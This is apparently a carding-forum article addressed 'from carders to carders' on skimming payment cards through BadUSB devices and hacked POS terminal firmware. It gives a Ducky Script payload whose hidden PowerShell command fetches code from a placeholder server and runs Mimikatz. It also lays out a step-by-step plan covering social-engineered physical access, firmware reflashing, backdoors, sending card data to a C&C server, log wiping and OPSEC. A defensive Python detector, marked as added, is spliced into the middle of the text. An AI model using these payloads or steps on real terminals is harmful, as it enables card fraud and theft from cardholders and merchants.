Skimming via hacked firmware of card readers and USB devices: from theory to practice

Good Carder

From carders to carders.

Skimming is no longer about ATM overlays and keypads. 2028 is the year of system-level attacks, where the card reader itself becomes your agent. BadUSB, POS terminal traffic interception via Bluetooth, keyboard emulation via USB Rubber Ducky — all this turns an "honest" device into a data theft tool.

In this article, I'll explain how BadUSB attacks are used to compromise payment software, how physical access to a USB port turns into remote theft of track numbers and PIN codes, which POS terminal vulnerabilities allow instant root access, and how all this is converted into dumps for cloning. I'll include real-world cases, hardware modification instructions, and protection methods — so you know how to avoid falling into your own trap.

I won't go into unnecessary detail about BadUSB as a class of attacks. That's already clear. But the true, hidden essence of this technique is much deeper. The BadUSB attack is based on a fundamental flaw in the USB protocol — the lack of strict control over device types, which is easily exploited with specialized software. Today, we're moving from physical skimming to firmware-level hardware and software hacking.


🕵️‍♂️ Part 1: USB Firmware Vulnerabilities and BadUSB Attacks

BadUSB exploits the reprogrammable nature of USB microcontrollers. The carder completely rewrites the device's firmware, turning a harmless flash drive into a spy tool. The firmware remains intact even after reinstalling the operating system, and standard antivirus software cannot detect it.

1.1. Example: BadUSB 2.0 MITM System

The five-class attack architecture includes:
  • Eavesdrop Class (Passive Interception). This class simply listens and stores the entire keystroke stream to the file system for later analysis. This passive data collection occurs without notifying the target user. The intercepted keystroke data is written to /tmp/badusb2-recorded, where it can be read later.
  • Modify Class (Substitution). This attack alters keystrokes on the fly, allowing one-time passwords (OTPs) to be attacked or user input to be spoofed. In the proof-of-concept implementation, the code simply decreases the keycode value.
  • Replay Class (Replay Attack). Automatically detects login sessions and intercepts entered credentials (login/password) for subsequent replay.
  • Fabricate Class (Active Injection). Injects arbitrary commands (including PowerShell scripting) or embeds files into the system. This allows, for example, the installation of malware that executes commands remotely.
  • Exfiltrate Class (Exfiltration). This class transmits data externally via Morse code using LED keys, which is transmitted via the display screen's operating parameters using encoding.

1.2. Equipment: from DIY solutions to ready-made devices

You don't need to be an engineer to carry out an attack. All you need are readily available tools, off-the-shelf commercial devices, or specialized software.
  • The USB Rubber Ducky is the gold standard of HID emulation. You plug in the device, it's recognized as a keyboard in seconds, and it injects a pre-prepared payload. The device operates at lightning speed—commands that disable protections and create backdoors are executed faster than you can blink. However, the Rubber Ducky is more often used for attacks on terminals by staff or in test lab environments.
  • Flipper Zero (around $170). A versatile multi-tool that can emulate HID devices (keyboards) and read and clone RFID/NFC tags. Its popularity has skyrocketed due to its compact size and ease of use.
  • Teensy is a DIY alternative for those who prefer to build their own hardware. This microcontroller is programmable using Arduino and can emulate a keyboard, mouse, or a combination of both.
  • A custom Python script for BadUSB allows for flexible attack customization. For example, the open-source project withdk/badusb2-mitm-poc demonstrates the operation of a MITM system and the implementation of the five attack classes discussed earlier.

Key point: Tools like BadUSB and Rubber Ducky completely bypass traditional USB locks, as the system sees them as standard keyboards that it trusts.

💻 Part 2. POS terminals as the main target: from physical access to root access

POS terminals are an ideal target for attacks via BadUSB and firmware modification. They are always connected to the network, process thousands of cards per day, and are often operated by employees whose vigilance leaves much to be desired.

2.1. CVE-2025-4371: BadCam and webcam attack

In 2025, vulnerability CVE-2025-4371 was discovered in some Lenovo webcam models. Researchers (dubbed BadCam) demonstrated how a hacked webcam could act as a BadUSB device, transforming it into a keyboard and injecting malicious commands into the system.

2.2. Worldline Yomani XR Vulnerability: 30 Seconds to Full Control

Swiss developer Stephane Glore discovered a critical vulnerability in the popular Swiss payment terminal, the Worldline Yomani XR. An unprotected debug port was hidden behind a discreet flap on the rear panel of the terminal. Connecting a standard serial cable, the researcher discovered that the terminal was running Linux (kernel version 3.6). Most surprisingly, after booting the system, entering "root" without a password was sufficient to obtain a shell. This was because the debug interface was unprotected.

This unauthorized access allowed the injection of malicious code, the interception of all traffic passing through the terminal, or the interruption of system updates. Although card data was processed in a second, more secure environment and remained inaccessible, overall control of the device allowed manipulation of network communications and the identification of other vulnerabilities within the processing network's communication channel.

2.3. PAX D177 Vulnerability: SoC Substitution and Firmware Signature

Researcher Lucas Tuske attempted to hack a PAX D177 PoS terminal and discovered several layers of protection. A tamper-evident trigger prevents access to the flash memory, and the firmware is digitally signed, making it impossible to forge. Furthermore, the keys in the NVRAM (non-volatile memory) are erased upon opening, rendering the device useless. However, the researcher found a way around this: he completely replaced the original SoC with a new one. The device ceased to function as a payment terminal, but it became possible to run custom code, opening the way for the creation of malicious payloads capable of doing anything with the card reader. The method is complex, but fundamentally feasible. Another point: attacks on such devices use ARM Cortex-M3 cores, which simplifies the task, as their architecture is well-documented.

2.4. Obtaining root access to a POS terminal: step-by-step

  1. Physical access to the terminal (can be arranged under the guise of “technical maintenance”).
  2. Using debug interfaces (UART, JTAG, SPI), which are often retained on boards and allow direct interaction with the terminal, bypassing security mechanisms. Techniques include extracting firmware through such interfaces to search for vulnerabilities in the code or to extract encryption keys.
  3. Modifying firmware to perform malicious operations, such as collecting card data or cloning transactions.
  4. Reflashing the device with modified firmware (via USB, JTAG or network).
  5. Data collection (exfiltration) via malicious code embedded in new firmware. Collected card data and PIN codes are sent to your server.

🐍 Part 3. CCID and APDU Vulnerabilities: When Card Readers Reveal Secrets

Some vulnerabilities arise at the communication protocol level between the card and the reader. For example, CCID (Chip/Smart Card Interface Devices) and APDU (Application Protocol Data Units). APDU vulnerabilities have been discovered in many popular brands (IDtech, Ingenico, Verifone, etc.) and allow complete control of the payment reader with a simple touch. A specialized Android app using NFC can cause a denial of service, compromise the device collecting and transmitting card data, alter the transaction amount, and even gain control of the host through SDK vulnerabilities.

For a better understanding, here is a list of potentially vulnerable components that can be compromised via APDU:
Component | Vulnerabilities | Potential consequences
NFC firmware | Buffer overflow, command injection | Full control over the card reader, theft of card data
Card reader drivers (CCID) | Downloading unauthorized firmware | Arbitrary code execution, backdoor
Host SDK | Lack of validation of input data | Further compromise of the POS system
Secure Elements | Vulnerabilities in cryptographic implementations | Extracting encryption keys

A classic attack example: Create a malicious Android app and use it to send specially crafted APDU requests to an NFC card reader. This can alter the transaction amount at the POS terminal without the cashier noticing.

In one case, an IDtech skimmer exploited vulnerabilities in APDU protocols to intercept magnetic stripe data on the host system. The attacker could trick the card reader into thinking it was processing a payment from a real card, when in fact, the data was generated by the criminal's phone.

🔧 Part 4. Practical Implementation of the BadUSB Attack

We've gathered all the information together. Now let's write a step-by-step plan that will turn theory into practice.

4.1. Necessary equipment and software

Hardware:
  • USB Rubber Ducky or Flipper Zero for keyboard emulation.
  • Arduino Micro/Pro Micro (programmable as HID device) for DIY projects.
  • FTDI adapter for connecting to debug interfaces (UART, JTAG, SPI) of a POS terminal.
  • (Optional) SDR device for intercepting and analyzing radio and NFC signals (may be required for card emulation).

Software:
  • Payload (script) for BadUSB (for example, a Powershell script for data exfiltration or backdoor installation).
  • Utilities for flashing chips and gaining root access.
  • Malicious POS terminal firmware (or a patch) that will send data to your server (written in C/C++ for the target ARM-Cortex or other architecture).

4.2. Step 1: Reconnaissance and Payload Preparation

Build or write a payload that will launch your attack after BadUSB is inserted.

Ducky Script:
# Example payload for PowerShell (Ducky Script)
REM Title: Ducky Payload for Information Stealing
DELAY 200
GUI r
DELAY 300
STRING powershell -w hidden -c "IEX (New-Object Net.WebClient).DownloadString('http://yourserver.com/payload.ps1'); Invoke-Mimikatz"
ENTER
DELAY 500

What useful software should do:
  • Collection of credentials: Logins, passwords, cached encryption keys (can help in intercepting traffic).
  • Saving card data: If the terminal interacts with cards (which is required), the script must be able to intercept the entered data.
  • Create a backdoor: Open a port for remote control to attack the terminal again whenever needed.
  • Sending data: Send everything intercepted to your C&C server.

4.3. Step 2: Physical Implementation

Use social engineering to gain physical access to the terminal. Simple tape and work clothes can work wonders. Connect BadUSB to a USB port.

4.4. Step 3: Installing a permanent backdoor through a series of commands

Your BadUSB device will send a series of quick commands. It can:
  1. Download and install malware on your computer to periodically send transaction tracks to your server.
  2. Collect cached credentials to log into the POS admin panel.
  3. Disable the system's defense mechanisms temporarily.
  4. Create a hidden user with administrative privileges.

4.5. Step 4: Data Collection and Exfiltration

The malware configured in the POS system will record all card tracking information as it passes through the terminal and send it to your server. It will also scan the system for encryption keys and payment gateway configuration files.

4.6. Step 5: Covering Your Tracks

After implementation:
  • Clear your system logs to ensure no traces of your visit remain.
  • Restore the integrity of the firmware, if possible, so that the owners do not suspect something is wrong.
  • Physically remove all traces of tampering with the terminal and its housing.

🛡️ Part 5. Defense and Countermeasures (Blue Team)

These measures will help you protect your POS systems and card readers from such attacks:
  1. USB Whitelisting. USB Whitelisting allows the use of only those USB devices whose VID/PID are signed with a corporate certificate.
  2. Firmware integrity check. You should verify the hashes of critical binaries responsible for security.
  3. Physical security: Don't leave USB ports accessible. Use USB locks, block ports in the BIOS, and seal debug connectors (UART, JTAG) with special seals.
  4. Monitor anomalies. Use SIEM for logs. Unusual network traffic, PowerShell execution from unknown locations, file modifications in system directories — send these to the SOC. Use EDR systems to monitor key nodes.
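As an added defensive example (not from the original post), a small Python detector that applies points 1 and 4 above to constructed sample log lines: it flags keyboard-class USB devices whose VID:PID is not on an allowlist, flags hidden PowerShell launches that carry a download cradle like the one in the Ducky payload shown earlier, and correlates the two when they happen within 30 seconds of each other. The log format, the VID:PID allowlist and the host name are assumptions for the example.

```python
import re
from datetime import datetime, timedelta

# Allowlist of approved keyboard VID:PID pairs (constructed placeholders, not a real policy).
ALLOWED_HID = {"046d:c31c", "04d9:0169"}

# Constructed sample events: USB arrivals and process creations from one POS host.
SAMPLE_LOGS = [
    "2028-03-01T10:02:11 HOST=POS-07 EVENT=usb_connect CLASS=HID VID=046d PID=c31c NAME='Approved Keyboard'",
    "2028-03-01T10:02:14 HOST=POS-07 EVENT=usb_connect CLASS=HID VID=cafe PID=0001 NAME='USB Keyboard'",
    "2028-03-01T10:02:15 HOST=POS-07 EVENT=process_create PARENT=explorer.exe "
    "CMD=powershell -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://yourserver.com/payload.ps1')\"",
    "2028-03-01T10:05:00 HOST=POS-07 EVENT=process_create PARENT=cmd.exe CMD=powershell -File C:\\scripts\\inventory.ps1",
]

# Download-cradle verbs and the hidden-window switch that a keystroke-injected launcher typically uses.
CRADLE = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
USB_RE = re.compile(r"EVENT=usb_connect CLASS=HID VID=([0-9a-f]{4}) PID=([0-9a-f]{4})", re.I)
PROC_RE = re.compile(r"EVENT=process_create PARENT=(\S+) CMD=(.*)$")


def analyze(lines, allowed_hid=ALLOWED_HID, window=timedelta(seconds=30)):
    """Return (alert_kind, detail) tuples for suspicious events in chronological log lines."""
    alerts = []
    last_bad_hid = None  # timestamp of the most recent unapproved keyboard arrival
    for line in lines:
        ts = datetime.fromisoformat(line.split(" ", 1)[0])
        m = USB_RE.search(line)
        if m:
            ident = f"{m.group(1)}:{m.group(2)}".lower()
            if ident not in allowed_hid:
                last_bad_hid = ts
                alerts.append(("unapproved_hid", ident))
            continue
        m = PROC_RE.search(line)
        if m and "powershell" in m.group(2).lower():
            cmd = m.group(2)
            if HIDDEN.search(cmd) and CRADLE.search(cmd):
                # A hidden cradle right after an unknown keyboard appeared is the BadUSB signature.
                recent = last_bad_hid is not None and ts - last_bad_hid <= window
                alerts.append(("hid_injected_cradle" if recent else "hidden_cradle", m.group(1)))
    return alerts


if __name__ == "__main__":
    for kind, detail in analyze(SAMPLE_LOGS):
        print(kind, detail)
```

The plain `-File` launch from cmd.exe produces no alert, so the rule keys on the hidden window plus cradle combination rather than on PowerShell use alone.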

⚠️ Part 6. OPSEC and Prevention

  1. Test your devices. BadUSB is a powerful tool that requires testing on cloned target systems. If you're unsure, don't use it.
  2. Be prepared to "burn" your equipment. Use only equipment that can be thrown away (or that you don't mind wasting). Consider disposable machines, disposable SIM cards, and disposable proxies.

💎 Summary from a carder

Classic skimmers are becoming a thing of the past, giving way to hardware and software hacking. BadUSB, Rubber Ducky, and similar devices emulate HID (keyboards) and enter commands on terminals without users noticing. POS terminals are an ideal target, as firmware vulnerabilities (such as the Worldline Yomani XR vulnerability) or debug interfaces (UART, JTAG) can be used to gain complete control of the device and steal transaction streams, turning them into cloning dumps.

BadUSB 2.0 implements the full stack: keyboard input spoofing (Eavesdrop, Modify), replay attacks (Replay), script and file injection (Fabricate), and covert data exfiltration via Morse code (Exfiltrate).

A quick one-line reminder:
"BadUSB isn't magic, it's microcontroller reflashing." POS terminals are hacked using UART debugging in 30 seconds. Encryption keys are the target. BadUSB 2.0 MITM System: interception, substitution, replay, injection. USB Rubber Ducky injects scripts at 1000+ characters per second. Flipper Zero emulates everything from a keyboard to an RFID key. 4 simple steps: PAYLOAD → USB → C&C → CLONE. USB device security is dead – remember that.